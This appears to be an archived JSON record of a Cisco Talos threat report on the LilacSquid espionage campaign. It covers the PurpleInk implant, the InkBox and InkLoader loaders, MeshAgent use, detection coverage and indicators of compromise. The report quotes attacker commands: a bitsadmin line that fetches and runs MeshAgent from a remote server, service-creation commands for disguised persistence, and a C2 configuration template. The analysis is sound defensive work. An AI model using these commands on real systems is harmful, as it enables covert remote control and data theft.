{
	"id": "84cef086-df8d-4165-9781-d10ec6b5b137",
	"created_at": "2026-04-06T00:12:44.36737Z",
	"updated_at": "2026-04-10T03:34:54.397603Z",
	"deleted_at": null,
	"sha1_hash": "3e44daec53d7f7320626b5e9890bd17f84618fe3",
	"title": "LilacSquid: The stealthy trilogy of PurpleInk, InkBox and InkLoader",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 432259,
	"plain_text": "LilacSquid: The stealthy trilogy of PurpleInk, InkBox and\r\nInkLoader\r\nBy Asheer Malhotra\r\nPublished: 2024-05-30 · Archived: 2026-04-05 17:11:53 UTC\r\nThursday, May 30, 2024 08:01\r\nBy Anna Bennett, Nicole Hoffman, Asheer Malhotra, Sean Taylor and Brandon White. \r\nCisco Talos is disclosing a new suspected data theft campaign, active since at least 2021, that we attribute to an\r\nadvanced persistent threat actor (APT) we’re calling “LilacSquid.”  \r\nLilacSquid’s victimology includes a diverse set of victims consisting of information technology\r\norganizations building software for the research and industrial sectors in the United States, organizations in\r\nthe energy sector in Europe and the pharmaceutical sector in Asia, indicating that the threat actor (TA) may\r\nbe agnostic of industry verticals and trying to steal data from a variety of sources.  \r\nThis campaign uses MeshAgent, an open-source remote management tool, and a customized version of\r\nQuasarRAT we’re calling “PurpleInk” to serve as the primary implants after successfully compromising\r\nvulnerable application servers exposed to the internet.  \r\nThis campaign leverages vulnerabilities in public-facing application servers and compromised remote\r\ndesktop protocol (RDP) credentials to orchestrate the deployment of a variety of open-source tools, such as\r\nMeshAgent and SSF, alongside customized malware, such as \"PurpleInk,\" and two malware loaders we are\r\ncalling \"InkBox\" and \"InkLoader.”  \r\nThe campaign is geared toward establishing long-term access to compromised victim organizations to\r\nenable LilacSquid to siphon data of interest to attacker-controlled servers. 
\r\nLilacSquid – An espionage-motivated threat actor \r\nhttps://blog.talosintelligence.com/lilacsquid/\r\nPage 1 of 9\n\nTalos assesses with high confidence that this campaign has been active since at least 2021 and the successful\r\ncompromise and post-compromise activities are geared toward establishing long-term access for data theft by an\r\nadvanced persistent threat (APT) actor we are tracking as \"LilacSquid\" and UAT-4820. Talos has observed at least\r\nthree successful compromises spanning entities in Asia, Europe and the United States consisting of industry\r\nverticals such as pharmaceuticals, oil and gas, and technology. \r\nPrevious intrusions into software manufacturers, such as the 3CX and X_Trader compromises by Lazarus, indicate\r\nthat unauthorized long-term access to organizations that manufacture and distribute popular software for\r\nenterprise and industrial organizations can open avenues of supply chain compromise proving advantageous to\r\nthreat actors such as LilacSquid, allowing them to widen their net of targets.  \r\nWe have observed two different types of initial access techniques deployed by LilacSquid, including exploiting\r\nvulnerabilities and the use of compromised remote desktop protocol (RDP) credentials. Post-exploitation activity\r\nin this campaign consists of the deployment of MeshAgent, an open-source remote management and desktop\r\nsession application, and a heavily customized version of QuasarRAT that we track as “PurpleInk” allowing\r\nLilacSquid to gain complete control over the infected systems. Additional means of persistence used by\r\nLilacSquid include the use of open-source tools such as Secure Socket Funneling (SSF), which is a tool for\r\nproxying and tunneling multiple sockets through a single secure TLS tunnel to a remote computer. 
\r\nIt is worth noting that multiple tactics, techniques, tools and procedures (TTPs) utilized in this campaign bear\r\nsome overlap with North Korean APT groups, such as Andariel and its parent umbrella group, Lazarus. Public\r\nreporting has noted Andariel’s use of MeshAgent as a tool for maintaining post-compromise access after\r\nsuccessful exploitation. Furthermore, Talos has observed Lazarus extensively use SOCKS proxy and tunneling\r\ntools, along with custom-made malware as part of their post-compromise playbooks to act as channels of\r\nsecondary access and exfiltration. This tactic has also been seen in this campaign operated by LilacSquid where\r\nthe threat actor deployed SSF along with other malware to create tunnels to their remote servers. \r\nLilacSquid’s infection chains \r\nThere are primarily two types of infection chains that LilacSquid uses in this campaign. The first involves the\r\nsuccessful exploitation of a vulnerable web application, while the other is the use of compromised RDP\r\ncredentials. Successful compromise of a system leads to LilacSquid deploying multiple vehicles of access onto\r\ncompromised hosts, including dual-use tools such as MeshAgent, Secure Socket Funneling (SSF), InkLoader and\r\nPurpleInk. \r\nSuccessful exploitation of the vulnerable application results in the attackers deploying a script that will set up\r\nworking directories for the malware and then download and execute MeshAgent from a remote server. On\r\nexecution, MeshAgent will connect to its C2, carry out preliminary reconnaissance and begin downloading and\r\nactivating other implants on the system, such as SSF and PurpleInk. 
\r\nMeshAgent is typically downloaded by the attackers using the bitsadmin utility and then executed to establish\r\ncontact with the C2: \r\nbitsadmin /transfer -job_name- /download /priority normal -remote_URL- -local_path_for_MeshAgent-\r\n-local_path_for_MeshAgent- connect \r\nInstrumenting InkLoader – Modularizing the infection chain \r\nWhen compromised RDP credentials were used to gain access, the infection chain was altered slightly. LilacSquid\r\nchose to either deploy MeshAgent and subsequent implants, or introduce another component in the infection\r\npreceding PurpleInk.  \r\nInkLoader is a simple, yet effective .NET-based malware loader. It is written to run a hardcoded executable\r\nor command. In this infection chain, InkLoader is the component that persists across reboots on the infected host\r\ninstead of the actual malware it runs. So far, we have only seen PurpleInk being executed via InkLoader, but\r\nLilacSquid may use InkLoader to deploy additional malware implants. \r\nTalos observed LilacSquid deploy InkLoader in conjunction with PurpleInk only when they could successfully\r\ncreate and maintain remote sessions via remote desktop (RDP) using stolen credentials for the\r\ntarget host. A successful login via RDP leads to the download of InkLoader and PurpleInk, copying these artifacts\r\ninto desired directories on disk and the subsequent registration of InkLoader as a service that is then started to\r\ndeploy InkLoader and, in turn, PurpleInk. 
The infection chain can be visualized as: \r\nService creation and execution on the endpoint is typically done via the command line interface using the\r\ncommands: \r\nsc create TransactExDetect displayname=Extended Transaction Detection binPath= _filepath_of_InkLoade\r\nsc description TransactExDetect Extended Transaction Detection for Active Directory domain hosts\r\nsc start TransactExDetect\r\nPurpleInk – LilacSquid's bespoke implant \r\nPurpleInk, LilacSquid’s primary implant of choice, has been adapted from QuasarRAT, a popular remote access\r\ntrojan family. Although QuasarRAT has been available to threat actors since at least 2014, we observed PurpleInk\r\nbeing actively developed starting in 2021 and continuing to evolve its functionalities separate from its parent\r\nmalware family.  \r\nPurpleInk uses an accompanying configuration file to obtain information such as the C2 server’s address and port.\r\nThis file is typically base64-decoded and decrypted to obtain the configuration strings required by PurpleInk. \r\nPurpleInk is a highly versatile implant that is heavily obfuscated and contains a variety of RAT capabilities. Talos\r\nhas observed multiple variants of PurpleInk where functionalities have both been introduced and removed. \r\nIn terms of RAT capabilities, PurpleInk can perform the following actions on the infected host: \r\nEnumerate processes and send the process ID, name and associated Window Title to the C2. \r\nTerminate a process ID (PID) specified by the C2 on the infected host. \r\nRun a new application on the host – start process. \r\nGet drive information for the infected host, such as volume labels, root directory names, drive type and\r\ndrive format. \r\nEnumerate a given directory to obtain underlying directory names, file names and file sizes. 
\r\nRead a file specified by the C2 and exfiltrate its contents. \r\nReplace or append content to a specified file. \r\nGather system information about the infected host using WMI queries. Information includes:  \r\nInformation retrieved  WMI query and output used \r\nProcessor name  SELECT * FROM Win32_Processor \r\nMemory (RAM) size in MB  Select * From Win32_ComputerSystem | TotalPhysicalMemory \r\nVideo Card (GPU)  SELECT * FROM Win32_DisplayConfiguration | Description \r\nUsername  Current username \r\nComputer name  Infected host’s name \r\nDomain name  Domain of the infected host \r\nHost name  NetBIOS Host name \r\nSystem drive  Root system drive \r\nSystem directory  System directory of the infected host \r\nComputer uptime  Calculate uptime from current time and SELECT * FROM Win32_OperatingSystem WHERE Primary='true' | LastBootUpTime \r\nMAC address  By enumerating Network interfaces on the endpoint \r\nLAN IP address  By enumerating Network interfaces on the endpoint \r\nWAN IP address  None – not retrieved or calculated – empty string sent to C2. \r\nAntivirus software name  Not calculated – defaults to “NoInfo” \r\nFirewall  Not calculated – defaults to “NoInfo” \r\nTime zone  Not calculated – an empty string is sent to the C2. \r\nCountry  Not calculated – an empty string is sent to the C2. \r\nISP  Not calculated – an empty string is sent to the C2. \r\nStart a remote shell on the infected host using ‘ cmd[.]exe /K ’. \r\nRename or move directories and files and then enumerate them. \r\nDelete files and directories specified by the C2. \r\nConnect to a remote address specified by the C2. This remote address, referenced internally as “Friend”,\r\nis the reverse proxy host, indicating that PurpleInk can act as an intermediate proxy tool. 
\r\nPurpleInk has the following capabilities related to communicating with its “friends” (proxy servers): \r\nConnect to a new friend whose remote address is specified by the C2. \r\nSend data to a new or existing friend. \r\nDisconnect from a specified friend. \r\nReceive data from another connected friend and process it. \r\nAnother PurpleInk variant, built and deployed in 2023 and 2024, consists of limited functionalities, with much of\r\nits capabilities stripped out. The capabilities that still reside in this variant are the abilities to: \r\nClose all connections to proxy servers. \r\nCreate a reverse shell.  \r\nConnect and send/receive data from connected proxies. \r\nFunctionalities, such as file management, execution and gathering system information, have been stripped out of\r\nthis variant of PurpleInk, but can be supplemented by the reverse shell carried over from previous variants, which\r\ncan be used to carry out these tasks on the infected endpoint. Adversaries frequently strip, add and stitch together\r\nfunctionalities to reduce their implant’s footprint on the infected system to avoid detection or to improve their\r\nimplementations to remove redundant capabilities.  \r\nInkBox – Custom loader observed in older attacks \r\nInkBox is a malware loader that will read from a hardcoded file path on disk and decrypt its contents. The\r\ndecrypted content is another executable assembly that is then run by invoking its Entry Point within the InkBox\r\nprocess. This second assembly is the backdoor PurpleInk. The overall infection chain in this case is: \r\nThe usage of InkBox to deploy PurpleInk is an older technique used by LilacSquid since 2021. Since 2023, the\r\nthreat actor has produced another variant of the infection chain where they have modularized the infection chain\r\nso that PurpleInk can now run as a separate process. 
However, even in this new infection chain, PurpleInk is still\r\nrun via another component that we call \"InkLoader.”  \r\nLilacSquid employs MeshAgent \r\nIn this campaign, LilacSquid has extensively used MeshAgent as the first stage of their post-compromise activity.\r\nMeshAgent is the agent/client from MeshCentral, an open-source remote device management software. The\r\nMeshAgent binaries typically use a configuration file, known as an MSH file. The MSH files in this campaign\r\ncontain information such as MeshName (victim identifier in this case) and C2 addresses: \r\nMeshName=-Name_of_mesh-\r\nMeshType=-Type_of_mesh-\r\nMeshID=0x-Mesh_ID_hex-\r\nServerID=-Server_ID_hex-\r\nMeshServer=wss://-Mesh_C2_Address-\r\nTranslation=-keywords_translation_JSON-\r\nBeing a remote device management utility, MeshAgent allows an operator to control almost all aspects of the\r\ndevice via the MeshCentral server, providing capabilities such as: \r\nList all devices in the Mesh (list of victims). \r\nView and control desktop. \r\nManage files on the system. \r\nView software and hardware information about the device.  \r\nPost-exploitation, MeshAgent activates other dual-use and malicious tools on the infected systems, such as SSF\r\nand PurpleInk.  \r\nCoverage \r\nWays our customers can detect and block this threat are listed below. \r\nCisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware\r\ndetailed in this post. Try Secure Endpoint for free here.   \r\nCisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in\r\nthese attacks.  \r\nCisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of\r\ntheir campaign. You can try Secure Email for free here.  
\r\nCisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat\r\nDefense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this\r\nthreat.  \r\nCisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco\r\nSecure products.  \r\nUmbrella, Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and\r\nURLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.  \r\nCisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites\r\nand tests suspicious sites before users access them.  \r\nAdditional protection with context to your specific environment and threat data are available from the Firewall\r\nManagement Center.  \r\nCisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your\r\nnetwork. \r\nOpen-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack\r\navailable for purchase on Snort.org.  \r\nThe following Snort SIDs have been released to detect this threat: 63511 - 63514, 300920 - 300921.\r\nIOCs\r\nIOCs for this research can also be found at our GitHub repository here. \r\nPurpleInk \r\n2eb9c6722139e821c2fe8314b356880be70f3d19d8d2ba530adc9f466ffc67d8 \r\nNetwork IOCs \r\n67[.]213[.]221[.]6 \r\n192[.]145[.]127[.]190 \r\n45[.]9[.]251[.]14 \r\n199[.]229[.]250[.]142 \r\nSource: https://blog.talosintelligence.com/lilacsquid/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MISPGALAXY",
		"Malpedia"
	],
	"references": [
		"https://blog.talosintelligence.com/lilacsquid/"
	],
	"report_names": [
		"lilacsquid"
	],
	"threat_actors": [
		{
			"id": "838f6ced-12a4-4893-991a-36d231d96efd",
			"created_at": "2022-10-25T15:50:23.347455Z",
			"updated_at": "2026-04-10T02:00:05.295717Z",
			"deleted_at": null,
			"main_name": "Andariel",
			"aliases": [
				"Andariel",
				"Silent Chollima",
				"PLUTONIUM",
				"Onyx Sleet"
			],
			"source_name": "MITRE:Andariel",
			"tools": [
				"Rifdoor",
				"gh0st RAT"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "110e7160-a8cc-4a66-8550-f19f7d418117",
			"created_at": "2023-01-06T13:46:38.427592Z",
			"updated_at": "2026-04-10T02:00:02.969896Z",
			"deleted_at": null,
			"main_name": "Silent Chollima",
			"aliases": [
				"Onyx Sleet",
				"PLUTONIUM",
				"OperationTroy",
				"Guardian of Peace",
				"GOP",
				"WHOis Team",
				"Andariel",
				"Subgroup: Andariel"
			],
			"source_name": "MISPGALAXY:Silent Chollima",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "113699a2-d359-43cd-a923-ac7525bae6a8",
			"created_at": "2024-06-07T02:00:04.010352Z",
			"updated_at": "2026-04-10T02:00:03.648005Z",
			"deleted_at": null,
			"main_name": "LilacSquid",
			"aliases": [],
			"source_name": "MISPGALAXY:LilacSquid",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "bc6e3644-3249-44f3-a277-354b7966dd1b",
			"created_at": "2022-10-25T16:07:23.760559Z",
			"updated_at": "2026-04-10T02:00:04.741239Z",
			"deleted_at": null,
			"main_name": "Andariel",
			"aliases": [
				"APT 45",
				"Andariel",
				"G0138",
				"Jumpy Pisces",
				"Onyx Sleet",
				"Operation BLACKMINE",
				"Operation BLACKSHEEP/Phase 3.",
				"Operation Blacksmith",
				"Operation DESERTWOLF/Phase 3",
				"Operation GHOSTRAT",
				"Operation GoldenAxe",
				"Operation INITROY/Phase 1",
				"Operation INITROY/Phase 2",
				"Operation Mayday",
				"Operation VANXATM",
				"Operation XEDA",
				"Plutonium",
				"Silent Chollima",
				"Stonefly"
			],
			"source_name": "ETDA:Andariel",
			"tools": [],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "a2b92056-9378-4749-926b-7e10c4500dac",
			"created_at": "2023-01-06T13:46:38.430595Z",
			"updated_at": "2026-04-10T02:00:02.971571Z",
			"deleted_at": null,
			"main_name": "Lazarus Group",
			"aliases": [
				"Operation DarkSeoul",
				"Bureau 121",
				"Group 77",
				"APT38",
				"NICKEL GLADSTONE",
				"G0082",
				"COPERNICIUM",
				"Moonstone Sleet",
				"Operation GhostSecret",
				"APT 38",
				"Appleworm",
				"Unit 121",
				"ATK3",
				"G0032",
				"ATK117",
				"NewRomanic Cyber Army Team",
				"Nickel Academy",
				"Sapphire Sleet",
				"Lazarus group",
				"Hastati Group",
				"Subgroup: Bluenoroff",
				"Operation Troy",
				"Black Artemis",
				"Dark Seoul",
				"Andariel",
				"Labyrinth Chollima",
				"Operation AppleJeus",
				"COVELLITE",
				"Citrine Sleet",
				"DEV-0139",
				"DEV-1222",
				"Hidden Cobra",
				"Bluenoroff",
				"Stardust Chollima",
				"Whois Hacking Team",
				"Diamond Sleet",
				"TA404",
				"BeagleBoyz",
				"APT-C-26"
			],
			"source_name": "MISPGALAXY:Lazarus Group",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "771d9263-076e-4b6e-bd58-92b6555eb739",
			"created_at": "2025-08-07T02:03:25.092436Z",
			"updated_at": "2026-04-10T02:00:03.758541Z",
			"deleted_at": null,
			"main_name": "NICKEL HYATT",
			"aliases": [
				"APT45 ",
				"Andariel",
				"Dark Seoul",
				"Jumpy Pisces ",
				"Onyx Sleet ",
				"RIFLE Campaign",
				"Silent Chollima ",
				"Stonefly ",
				"UN614 "
			],
			"source_name": "Secureworks:NICKEL HYATT",
			"tools": [
				"ActiveX 0-day",
				"DTrack",
				"HazyLoad",
				"HotCriossant",
				"Rifle",
				"UnitBot",
				"Valefor"
			],
			"source_id": "Secureworks",
			"reports": null
		}
	],
	"ts_created_at": 1775434364,
	"ts_updated_at": 1775792094,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/3e44daec53d7f7320626b5e9890bd17f84618fe3.pdf",
		"text": "https://archive.orkl.eu/3e44daec53d7f7320626b5e9890bd17f84618fe3.txt",
		"img": "https://archive.orkl.eu/3e44daec53d7f7320626b5e9890bd17f84618fe3.jpg"
	}
}